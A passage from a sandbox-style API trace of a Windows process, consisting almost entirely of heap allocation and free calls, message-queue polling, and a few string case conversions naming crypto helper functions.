(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0176.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0176.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.031] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0176.031] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.031] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0176.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0176.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0176.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0176.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.032] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0176.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.033] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.034] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0176.035] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.035] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0176.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0176.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0176.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: 